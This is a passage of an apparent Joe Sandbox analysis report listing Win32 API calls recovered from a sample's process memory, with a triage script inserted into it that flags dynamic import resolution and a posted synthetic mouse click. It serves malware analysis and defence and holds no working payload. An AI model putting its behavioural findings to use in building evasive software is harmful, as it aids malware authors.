                                                                                                                                                                                          • Instruction Fuzzy Hash: A4515C35604205DFDB11DF68C485ED9BBB0FF09314B15C0A8EA1AAB362D739ED85CB81
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetWindowLongW.USER32(00000002,000000F0,?), ref: 007C766B
                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,?), ref: 007C7682
                                                                                                                                                                                          • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 007C76AB
                                                                                                                                                                                          • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,007AB5BE,00000000,00000000), ref: 007C76D0
                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 007C76FF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3688381893-0
                                                                                                                                                                                          • Opcode ID: 183d12748a35b1eccb3da46892856f110188f9c01f29bd35c85f2d66bb9dd70d
                                                                                                                                                                                          • Instruction ID: d6d9e7ca7cd3488f4e7a3c8503bda1e24a1fa87bf3f192db37d9ecf1cbc63e46
                                                                                                                                                                                          • Opcode Fuzzy Hash: 183d12748a35b1eccb3da46892856f110188f9c01f29bd35c85f2d66bb9dd70d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2241AD35A08504AFD729CF2CCC48FAA7BA5EB09360F15426CF819B72E0DB78AD51DE50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                          • Opcode ID: c66d2c5e940df5ea29dfee0787c467e0c54b14be91259bd4482d27a8b8c61aee
                                                                                                                                                                                          • Instruction ID: acbc4927ac62220a2904679b4055bfe7c44c13fa0acedcfcad18eb1f6d41048a
                                                                                                                                                                                          • Opcode Fuzzy Hash: c66d2c5e940df5ea29dfee0787c467e0c54b14be91259bd4482d27a8b8c61aee
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7341E472A006009FDB20DF78C884A5DB7E1EF89314F154568E916EB352EB39AD02CB81
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetInputState.USER32 ref: 007A4310
                                                                                                                                                                                          • TranslateAcceleratorW.USER32(?,00000000,?), ref: 007A4367
                                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 007A4390
                                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 007A439A
                                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007A43AB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2256411358-0
                                                                                                                                                                                          • Opcode ID: b0c42e62d9dbd1c0af3e10e3a7e8980bc750ca615ae33772537c6dfd0867db82
                                                                                                                                                                                          • Instruction ID: d8ffa8e07e73a72f64b1557e499167159edf269ad27a464c7cb5dd49109aabdd
                                                                                                                                                                                          • Opcode Fuzzy Hash: b0c42e62d9dbd1c0af3e10e3a7e8980bc750ca615ae33772537c6dfd0867db82
                                                                                                                                                                                          • Instruction Fuzzy Hash: F6319070504246DEEF34CB64D84DFB67BA8BBC2304F04466DD462921A0E3EE9845CB25
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

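The per-function listings above are the Joe Sandbox IDA plugin's summary of which Win32 APIs each recovered function calls, with argument values where static analysis could resolve them ("?" means it could not). Two chains in this process dump are worth pulling out mechanically: the LoadLibraryW / GetProcAddress / FreeLibrary sequence at 007B999D (imports resolved at run time rather than through the import table) and the GetWindowRect / PostMessageW / Sleep sequence listed next, whose recovered uMsg values 0x0201 and 0x0202 are WM_LBUTTONDOWN and WM_LBUTTONUP, i.e. a posted mouse click with a pause between press and release. The following Python script is an added example and is not part of the Joe Sandbox report or its tooling: it parses these "• Func.MODULE(args), ref: ADDR" lines, groups them under each "APIs" header, decodes a few message constants and tags the chains. The sample input is copied from this page; the grouping rule, the pattern names and the message-ID table are this example's own assumptions, and every decoded constant inherits the caveat that the plugin's argument recovery is best-effort.

```python
"""Triage helper for the Joe Sandbox IDA-plugin 'APIs' listings printed in this report.
Added example, not Joe Sandbox code. Sample lines are copied from this page; the grouping
rule, the pattern names and the constant table are this example's own assumptions."""
import re
from collections import namedtuple

# Constructed from the listings on this page (process 0000000A, image base 0x730000).
SAMPLE = """\
APIs
• LoadLibraryW.KERNEL32(?,00000000,?), ref: 007B999D
• GetProcAddress.KERNEL32(00000000,?), ref: 007B9A2D
• GetProcAddress.KERNEL32(00000000,00000000), ref: 007B9A49
• GetProcAddress.KERNEL32(00000000,?), ref: 007B9A8F
• FreeLibrary.KERNEL32(00000000), ref: 007B9AAF
  • Part of subcall function 0074F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,007A1A02,?,753CE610), ref: 0074F9F1
Memory Dump Source
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
APIs
• SetWindowLongW.USER32(00000002,000000F0,?), ref: 007C766B
• SendMessageW.USER32(00000002,00001036,00000000,?), ref: 007C76AB
APIs
• GetInputState.USER32 ref: 007A4310
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007A43AB
APIs
• GetWindowRect.USER32(?,?), ref: 00792262
• PostMessageW.USER32(00000001,00000201,00000001), ref: 0079230E
• Sleep.KERNEL32(00000000,?,?,?), ref: 00792316
• PostMessageW.USER32(00000001,00000202,00000000), ref: 00792327
• Sleep.KERNEL32(00000000,?,?,?,?), ref: 0079232F
"""

ApiCall = namedtuple("ApiCall", "func module args ref subcall")

# "• Func.MODULE(args), ref: ADDR", optionally prefixed with "Part of subcall function X:",
# and with the argument list optional (GetInputState is printed without one).
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<subfn>[0-9A-F]{8}):\s*)?"
    r"(?P<func>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Win32 message IDs seen in this report (assumed decode table, not sandbox output).
MSG_NAMES = {0x0201: "WM_LBUTTONDOWN", 0x0202: "WM_LBUTTONUP", 0x1036: "LVM_SETEXTENDEDLISTVIEWSTYLE"}


def parse_api_blocks(text):
    """Group API lines under each 'APIs' header; every other report line is ignored."""
    blocks, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            blocks.append(current)
            continue
        m = _LINE.match(line)
        if m and current is not None:
            raw = m.group("args")
            args = tuple(a.strip() for a in raw.split(",")) if raw else ()
            current.append(ApiCall(m.group("func"), m.group("mod"), args,
                                   int(m.group("ref"), 16), m.group("subfn")))
    return blocks


def hex_arg(arg):
    """Argument as int when the plugin recovered a constant, None for '?'."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None


def decode_messages(block):
    """(ref, message name) for Post/SendMessage calls whose uMsg argument was recovered."""
    out = []
    for c in block:
        if c.func in ("PostMessageW", "PostMessageA", "SendMessageW", "SendMessageA") and len(c.args) >= 2:
            msg = hex_arg(c.args[1])
            out.append((c.ref, "?" if msg is None else MSG_NAMES.get(msg, f"0x{msg:04X}")))
    return out


def flag_patterns(block):
    """Heuristic labels for API chains worth a closer look; subcall context lines are excluded."""
    names = {c.func for c in block if c.subcall is None}
    flags = []
    if names & {"LoadLibraryW", "LoadLibraryA", "LoadLibraryExW", "LoadLibraryExA"} and "GetProcAddress" in names:
        flags.append("dynamic-import-resolution")   # imports resolved at run time, absent from the IAT
    msgs = [name for _, name in decode_messages(block)]
    if "WM_LBUTTONDOWN" in msgs and "WM_LBUTTONUP" in msgs and "Sleep" in names:
        flags.append("synthetic-mouse-click")       # posted press/release pair with a pause between
    if names & {"PeekMessageW", "PeekMessageA", "GetMessageW", "GetMessageA"}:
        flags.append("message-pump")
    return flags


def triage(text):
    """[(first own ref as hex, [function names], [flags])] per APIs block, skipping empty ones."""
    result = []
    for block in parse_api_blocks(text):
        own = [c for c in block if c.subcall is None] or block
        if not own:
            continue
        result.append((f"{own[0].ref:08X}", [c.func for c in block], flag_patterns(block)))
    return result


if __name__ == "__main__":
    for start, funcs, flags in triage(SAMPLE):
        print(start, ",".join(funcs), flags or "-")
```

Run against the whole report text, `triage()` gives one row per recovered function, which is a quicker way to find the handful of functions that matter than scrolling the listings; the flags are starting points for manual review, not verdicts, since the same LoadLibrary/GetProcAddress chain appears in plenty of legitimate runtimes.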
APIs
• GetWindowRect.USER32(?,?), ref: 00792262
• PostMessageW.USER32(00000001,00000201,00000001), ref: 0079230E
• Sleep.KERNEL32(00000000,?,?,?), ref: 00792316
• PostMessageW.USER32(00000001,00000202,00000000), ref: 00792327
• Sleep.KERNEL32(00000000,?,?,?,?), ref: 0079232F
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
• Opcode ID: 68c952313ba562a089535532f7fc3806ccd2db25317f85fd8c2f4a4871298392
                                                                                                                                                                                          • Instruction ID: c2c98fdca5d5520b1446dd5021b1416b6554f2f891f067645df1ca7866e0c811
                                                                                                                                                                                          • Opcode Fuzzy Hash: 68c952313ba562a089535532f7fc3806ccd2db25317f85fd8c2f4a4871298392
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D31CD72900219EFDF10DFA8DD88A9E3BB5FB04315F118229F921A72D1C378AD41CB90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 007C61E4
• SendMessageW.USER32(?,00001074,?,00000001), ref: 007C623C
• _wcslen.LIBCMT ref: 007C624E
• _wcslen.LIBCMT ref: 007C6259
• SendMessageW.USER32(?,00001002,00000000,?), ref: 007C62B5
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: MessageSend$_wcslen
• String ID:
• API String ID: 763830540-0
• Opcode ID: e9102d0c8fa600f8363b4dda244b9eabe996c741be22191f444be5dd5ef28716
• Instruction ID: 318448d82cb7b711e5271ea02a3c399a873349c9c6117f09177b4650826e788c
• Opcode Fuzzy Hash: e9102d0c8fa600f8363b4dda244b9eabe996c741be22191f444be5dd5ef28716
• Instruction Fuzzy Hash: F82196759002589BDB219F54CC88FEEB7B8FF44314F10821EF925EA180D7789985CF50
Uniqueness
• Uniqueness Score: -1.00%

APIs
• IsWindow.USER32(00000000), ref: 007B13AE
• GetForegroundWindow.USER32 ref: 007B13C5
• GetDC.USER32(00000000), ref: 007B1401
• GetPixel.GDI32(00000000,?,00000003), ref: 007B140D
• ReleaseDC.USER32(00000000,00000003), ref: 007B1445
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
• Opcode ID: 4fd377cb2b01c7ff989f4d85e0e1b94c3601cf20a1d7dba8616c1f9125da5fba
• Instruction ID: 8d3192c68937db927f4d18858b4732d30eaccd6943423cfad5e6a29851970360
• Opcode Fuzzy Hash: 4fd377cb2b01c7ff989f4d85e0e1b94c3601cf20a1d7dba8616c1f9125da5fba
• Instruction Fuzzy Hash: BD218E76600204EFD714EF65C898E9EB7F5EF89340B04843DF85AA7752DA38AC40CB90
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0076D146
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0076D169
  • Part of subcall function 00763B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00756A79,?,0000015D,?,?,?,?,007585B0,000000FF,00000000,?,?), ref: 00763BC5
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0076D18F
• _free.LIBCMT ref: 0076D1A2
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0076D1B1
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: beafea40b5a39edc17bf77386a06e6ad19bdee81cee71a4799704bdfbe7df36b
• Instruction ID: caf0416af120d9e8b64d1170f32f16f984de2a44a1c86bad7bfc6ebf3a1c86aa
• Opcode Fuzzy Hash: beafea40b5a39edc17bf77386a06e6ad19bdee81cee71a4799704bdfbe7df36b
• Instruction Fuzzy Hash: 5E01D472F1161DBF333526769C8CC7B6B6EDEC3BA131A012DFC0AC6240DAA88C0181B0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(0000000A,?,?,0075F64E,0075545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00763170
• _free.LIBCMT ref: 007631A5
• _free.LIBCMT ref: 007631CC
• SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 007631D9
• SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 007631E2
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: ae46f1c80bcdfff1be1398c01db1e9f3bf6ff2d5c6cb7b55e20efe11c2c4da6b
• Instruction ID: b686dd7c49fd7ea8e35dcc121d9cfef90f3948033a3cd99ad5c83f3f0e6af4dd
• Opcode Fuzzy Hash: ae46f1c80bcdfff1be1398c01db1e9f3bf6ff2d5c6cb7b55e20efe11c2c4da6b
• Instruction Fuzzy Hash: 5501F472644E04AB962627349C8DE6B266DAFC33B13220528FC27D2182EF6D8E02C124
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00790831,80070057,?,?,?,00790C4E), ref: 0079091B
• ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00790831,80070057,?,?), ref: 00790936
• lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00790831,80070057,?,?), ref: 00790944
• CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00790831,80070057,?), ref: 00790954
• CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00790831,80070057,?,?), ref: 00790960
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: From$Prog$FreeStringTasklstrcmpi
• String ID:
• API String ID: 3897988419-0
• Opcode ID: 8f63801d9927f5b07af9068db4be580eda63c5bc88ec1f998e51a2094fcb9e50
• Instruction ID: ee263d3e356759164058bcf6557e5e1b307556fbbde19a965f914a8f27b941bf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f63801d9927f5b07af9068db4be580eda63c5bc88ec1f998e51a2094fcb9e50
                                                                                                                                                                                          • Instruction Fuzzy Hash: E3018F76610204AFEB204F55EC48F9A7BEDEB44765F144128FD05E2212E779ED409BA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00791A60
• GetLastError.KERNEL32(?,00000000,00000000,?,?,007914E7,?,?,?), ref: 00791A6C
• GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,007914E7,?,?,?), ref: 00791A7B
• HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,007914E7,?,?,?), ref: 00791A82
• GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00791A99
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
• API String ID: 842720411-0
• Opcode ID: 239bc1c13bfbe1de9317296a7c3475c69e4daaff34d05e9decf84bc93d0a04e1
• Instruction ID: 754804856ba5e9f69a3da02af28ac708cdb721ddeb6be1fbaadcbb3f60022851
• Opcode Fuzzy Hash: 239bc1c13bfbe1de9317296a7c3475c69e4daaff34d05e9decf84bc93d0a04e1
• Instruction Fuzzy Hash: 520181B5601606BFDF214F65EC48E6A3B6EEF843A4B218428F845D3360DB35DC50CA60
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00791976
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00791982
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00791991
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00791998
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007919AE
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: 3613dc7f339b26f33ad2708d375ba8fa519bc530e97f30a03cf9328517cfd9de
• Instruction ID: 6bf1ca7e5b11eaa1685c05ceccf894114e135908e75b63f33aa7986cee68db2c
• Opcode Fuzzy Hash: 3613dc7f339b26f33ad2708d375ba8fa519bc530e97f30a03cf9328517cfd9de
• Instruction Fuzzy Hash: 42F06D75240306ABDB214FA9EC59F563BADEF897A0F514428FE45C72A0CA78EC518A60
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00791916
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00791922
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00791931
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00791938
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0079194E
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: b2326885d24d0f4189a6a2c96d1e6e1399eeff47aaf1f7ee579d3f6f609619b5
• Instruction ID: 2e635e946878d6d37ed1c6541ecaadccf80f3c244569799a4bdc7a0fb3ff5e8f
• Opcode Fuzzy Hash: b2326885d24d0f4189a6a2c96d1e6e1399eeff47aaf1f7ee579d3f6f609619b5
• Instruction Fuzzy Hash: AEF06275200306ABDB210FA9EC5DF563B6DEF897A0F514428FE45D7250CA78EC518A64
Uniqueness
Uniqueness Score: -1.00%

APIs
• CloseHandle.KERNEL32(?,?,?,?,007A0B24,?,007A3D41,?,00000001,00773AF4,?), ref: 007A0CCB
• CloseHandle.KERNEL32(?,?,?,?,007A0B24,?,007A3D41,?,00000001,00773AF4,?), ref: 007A0CD8
• CloseHandle.KERNEL32(?,?,?,?,007A0B24,?,007A3D41,?,00000001,00773AF4,?), ref: 007A0CE5
• CloseHandle.KERNEL32(?,?,?,?,007A0B24,?,007A3D41,?,00000001,00773AF4,?), ref: 007A0CF2
• CloseHandle.KERNEL32(?,?,?,?,007A0B24,?,007A3D41,?,00000001,00773AF4,?), ref: 007A0CFF
• CloseHandle.KERNEL32(?,?,?,?,007A0B24,?,007A3D41,?,00000001,00773AF4,?), ref: 007A0D0C
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 785a6e43924d04afb1b515daaa0942c8e51fbd800488c9c677b09b4efef1739d
• Instruction ID: 78f9cf65213944731360670a631bf213ae252ba6ea710b26068d94989a65fb6f
